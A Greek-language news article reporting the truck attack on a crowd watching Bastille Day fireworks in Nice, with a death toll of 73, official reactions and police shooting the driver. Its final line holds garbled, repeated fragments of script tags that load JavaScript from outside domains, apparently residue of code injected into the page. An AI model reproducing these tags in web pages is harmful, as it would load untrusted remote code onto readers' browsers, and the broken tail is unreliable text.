Γαλλία: Τρόμος και αίμα στη Νίκαια! Φορτηγό έπεσε πάνω σε πλήθος κόσμου! Δεκάδες νεκροί

nice

H Γαλλία ζει ένα νέο εφιάλτη. Αυτή την φορά το σκηνικό του τρόμου έχει στηθεί στη Νίκαια της Γαλλίας όπου ένα φορτηγό έπεσε πάνω σε ένα πλήθος ανθρώπων που είχαν συγκεντρωθεί για να δουν τη ρίψη πυροτεχνημάτων για την εθνική εορτή της Γαλλίας.

Αυτό που ακολούθησε δεν το χωράει ανθρώπου νους. Πολίτες που ανυποψίαστοι ήταν στους δρόμους αυτό το βράδυ της 14ης Ιουλίου ξαφνικά άρχισαν να τρέχουν πανικόβλητοι για να ξεφύγουν. Υπήρχε αίμα παντου. Οι εικόνες που καταγράφηκαν από τα κινητά τηλέφωνα και ήδη κάνουν τον γύρο του κοσμου είναι συγκλονιστικές. Το ίδιο και οι εικόνες που φτάνουν από τα διεθνή ειδησεογραφικά πρακτορεία.

Ο Φρανσουά Ολάντ που βρισκόταν στην Αβινιόν επιστρέφει εσπευσμένα στο Παρίσι και συγκαλεί υπουργικό συμβούλιο. Ο εφιάλτης δεν έχει τελειώσει. O Μπαράκ Ομπάμα ενημερώνεται συνεχώς για την κατάσταση.

Οι γαλλικές αρχές κάνουν λόγο για τρομοκρατική επίθεση, και οι νεκροί έχουν φτάσει τους 73 και ο αριθμός των τραυματιών είναι ανυπολόγιστος. Η επίθεση έγινε στη λεωφόρο Προμενάντ ντεζ Ανγκλέ, μια περιοχή πολύ δημοφιλή στους τουρίστες. Η αστυνομία έχει στήσει περίμετρο ασφαλείας στην περιοχή. Οταν το φορτηγό σταμάτησε την τρελή πορεία του αστυνομικοί το περικύκλωσαν και το γάζωσαν στην κυριολεξία. Ο οδηγός είναι νεκρός και τα στοιχεία του δεν έχουν εξακριβωθεί. Σύμφωνα με το BBC μεσα στο φορτηγό βρέθηκαν όπλα και χειροβομβίδες.

 

Οι αρχές του διαμερίσματος Αλπ-Μαριτίμ έκαναν λόγο περί επίθεσης και κάλεσαν τους πολίτες να παραμείνουν κλεισμένοι στα σπίτια τους.

 ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >